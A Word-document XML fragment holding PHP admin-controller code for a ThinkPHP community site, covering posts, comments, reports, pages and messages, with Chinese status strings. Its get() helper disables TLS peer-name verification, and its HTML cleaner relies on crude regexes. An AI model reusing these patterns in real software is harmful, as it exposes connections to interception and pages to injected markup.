          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9A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AD90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Db::name('circle')-&gt;where('id', $aritlce['id'])-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B864F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2AAAF7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[$text[$type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDBA7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4BFE4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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAA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6FC9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1A3D8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['GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C21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F65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F3E67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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827F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66CB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2A177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6BC1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review()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC6D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2FB5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 = ['in', '2,3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09646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Db::name('circle')-&gt;where($map)-&gt;order('des desc,id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08B6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$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E32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5E2232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0E9F9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B0FB1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1D8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B6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45D7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Db::name('article_ping')-&gt;order('id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D62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68A1F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$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292AD3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AFC46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B2E0A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0537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pingAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57F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DE0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655230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1D167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032D27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Db::name('circle')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FA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4F3A49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0A1B6B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8F1A3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492B75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5008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719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0798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40E05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Db::name('article_ping')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A82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Db::name('circle')-&gt;where('id', $name['aid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA63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$pingList = Db::name('article_ping_xia')-&gt;where('ping_id', $id)-&gt;order('id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0616E6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$pingList-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794C0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0B229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($name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E018B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$this-&gt;assign('circle', $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60F1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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E128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$this-&gt;assign('pingList', $pingList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886E9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AB06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3D8A6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E9F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DF85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11232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791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ACE1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7B9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pingDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BD5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EC05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678F5B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01C0A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57D27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Db::name('article_ping')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B20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4812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1992CD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FDC1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2A4DC0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E889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AE06D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5EE43C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FFA1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DF22C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1E9E22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8CC3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A323F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4AAE6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pingXaiDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D00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DBB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5CBEA3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1883B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11681D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Db::name('article_ping_xia')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251E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C35F0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3C45D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D6717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56FFF5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6C02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EB915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0D738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440E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1DF3C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4C14F7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7038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B3319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5D8F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jubao()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61E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FB70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Db::name('jubao')-&gt;order('id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B0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6FAAF5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$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C86E6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2E368E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E0A4A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D5D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jubaoHuifu()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9F6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4240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219E4D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511A2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input('content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731037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503DD1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Db::name('jubao')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93EB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BABC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$adminId = Session::get('admin', 'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4767D3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$db['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D1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 = $db['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77205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 = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C63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5AC28A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$where['admin_id'] = $adminId['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74436B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Db::name('jubao')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59922D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7DF3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回复成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1860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44B9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回复失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB9B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68AA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6E3D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E4260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636B0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C3F1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C378E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3A6F8F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DBEB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3D367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3FD0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jubaoDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AD8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866E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7F52DC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28DCD3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3A9FF9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Db::name('jubao')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26416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68E5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0E5CE5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CDC8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52E3C7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70C4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C2DEA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58784F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8297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F07DD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0BD52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FAB2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BB0A3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782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page()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F3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782C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Db::name('page')-&gt;order('id asc,des desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856D8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$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7A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4291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85C8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pageAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6EDE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603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15A0F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5C5F1A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47824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6BF2A0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($post['title']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A36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 = Db::name('page')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC70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($titledb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFF6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文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA189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19B3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FDDD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Db::name('page')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15306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CD99B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431D94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0CCD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2E855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E4E1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039CB3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Db::name('page')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E0F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($db) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB6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7068B5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BFE20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5F1FAD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49EC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F360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ED6BE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1F643A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Db::name('page')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332F4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($name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3C4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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36C1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EB643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713DA2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8DC6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1298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1A7131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7C55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3E028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717C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get($url, $json = false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C3B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4BE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$arrContextOptions = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631121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"ssl" =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234967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 =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52257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"verify_peer_name" =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A9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6D88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2826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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5720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($json) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259526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json_decode($html, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6E0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2FDE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F34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147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qiniu($url, $type = '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3D1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41E8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(!$url) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471A8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274BC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555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611E82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'.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A925F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76AA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3F7F06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0728E0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46384D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79016B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46853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$bmgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003290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2ECB64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md5($url . rand(11111, 999999)) . $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBA9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$bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450310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219B3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B291D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3505F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$key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D750E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A809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8F75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_html_content($article)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE84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101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preg_match_all("/src=\"(.*?)\"/", $article, $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545C37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB9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($img) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB69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($img[1] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FB5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$img_1 = $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009A1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$img_2 = _imgUrl() . $this-&gt;qiniu($img_1, 'circle');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86EF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($img_1 &amp;&amp; $img_2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB1BA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str_replace($img_1, $img_2, $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404678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7BE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D0D1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FFDE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preg_replace("/(img_width.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F958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preg_replace("/(img_height.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3D0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preg_replace("/(onerror.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4626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preg_replace("/(inline.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67300E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preg_replace("/&lt;(p.*?)&gt;/si", "&lt;p&gt;", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B1F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preg_replace("/&lt;(\/?figure.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28B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preg_replace("/&lt;(\/?a.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EDF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preg_replace("/(data.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524318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preg_replace("/(width.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7301D0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preg_replace("/(alt.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7C9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preg_replace("/(style.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5B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$article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5CE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1E47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49C5D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6DC5DD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5AC8B1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603C9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0FA35A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08D22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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9DD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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D15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124EC0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Message extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E9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B7997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types()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B2C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91F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$types = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717896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3A3707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$types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3842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55276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A0AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B79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29AE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$type_id = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F04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Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C2E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$type_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75320B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BE65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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B7A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66EDC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12B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add_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17194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C14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75B5DC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5CE12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45D5C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E245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44A1E8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1254A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$message_type = Db::name('message_type')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55951A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($message_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422CE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同标题分类已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5653A3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BAC7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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559057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Db::name('message_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D44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69C06E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165259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0302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025D1F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89A1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3FFD2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Db::name('message_type')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD654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2778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4E421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84FB9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059126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7E4A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FAE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C0BD0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'post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4378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7B9E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8885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213A46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Db::name('message_type')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA7C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4E6DD0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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE3D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9E44B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662FB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725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0404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4227DB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0CF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39A21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FB7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delete_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC7B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754D4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1C5C01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10BC59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24C81D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2C3016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$message_count = Db::name('message')-&gt;where('type_id', $id)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE13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($message_count &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2327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Db::name('message_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA64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C88A2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60DB71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D95E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5AFD58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470B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48D1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属性下有文章，请先删除文章对应属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD46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0AF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99053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60CD4E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4803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8C67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00DFC9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5011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EBC6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378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2DACA0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972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$types = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5F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66A0D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input('type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D943A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 = input('search_name', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E2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Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A416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-&gt;order('id desc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFD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($type_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1079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$query-&gt;where('type_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FEB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F94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($search_name != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B6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$query-&gt;where('content', 'like', '%' . $search_name . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EE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B8F9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$query-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F73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 = $data-&gt;toArray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F3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($messages as $key =&gt; $message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEC32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$messages[$key]['type'] = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BC1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$message['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9F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-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46617A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$messages[$key]['sender_info'] = $message['sender_id'] ? '(' . $message['sender_id'] . ') ' . _user($message['sender_id'])['username'] : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来自平台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24947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D025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1F4BF7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$this-&gt;assign('type_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40649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$this-&gt;assign('types', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E484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$messages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBF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$this-&gt;assign('page', $page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F1A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68C827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A8BE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219563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217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$types = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6EF2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-&gt;order('id asc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344FF9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B1EFB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$this-&gt;assign('types', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9AB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input('param.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E257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7DAEC4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34ABA9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($post['type_id'] &lt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38846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请选择消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B815C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D5C1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($post['create_time']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C1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strtotime($post['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655A3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E72A2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2EDCE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368F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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0436F0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(!empty($post['content'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB840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$post['content'] = trim($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992F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2C47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5BBE01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($post['recipient_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E05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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906A0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-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F78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240EA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603F3C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5065C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1013F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63CB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7922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$members = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1287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-&gt;order('id asc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC0E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4E27F3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($members as $member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA99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$post['recipient_id'] = $member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F261C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Db::name('message')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E94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448C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04C5AE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BE55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6D8D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576BC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5C9CCC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-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06634B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2A49CA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6BF91F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F3F7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514747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69F94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0F37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9C872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39DA1B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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5489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691E25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4A225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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81C9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$this-&gt;assign('type_id', $message['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D208D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$this-&gt;assign('message', $message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D350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9BBA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2F3A63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FD6F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BBB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729C4C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245C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AF30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91F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delete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C4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4C2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10BCD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38D5F4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03047C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5E1B7A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Db::name('message')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A1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2D607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77F80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0A910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70F14B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E8B1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0EC8E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4E1EC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C31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C6DF8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提交参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F603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ECC2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6DBA6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9A41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desAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD400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29A7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70028F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2D52A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($post['des'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571154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intval($k);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7D1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intval($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884D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Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26E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0D7782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-&gt;setField('des', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB0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51F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更新排序成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995FE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A47F0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 = ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E19B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292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AEAC2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2F7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delAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D94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2D6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4D5816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47656D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(input('?post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19285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$post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8FBA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Db::name('message')-&gt;delete($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E03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65EB9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1AC0A5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B8A9B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3F6C3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7ECC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C6CEB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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993ED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151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436FB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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4944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C4F1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B7962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CC64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all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4550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318B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0BBF5F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47ADFF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input('type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79312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(input('?post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C9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$post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA695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($post as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B387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 'del') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C2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$db-&gt;delete($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30984B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DA108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$db-&gt;where('id', $v)-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB7C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7AF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E21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1EA0B9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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE94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9BC2A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA8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51AD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06C1A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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34A0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F13C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89BB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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
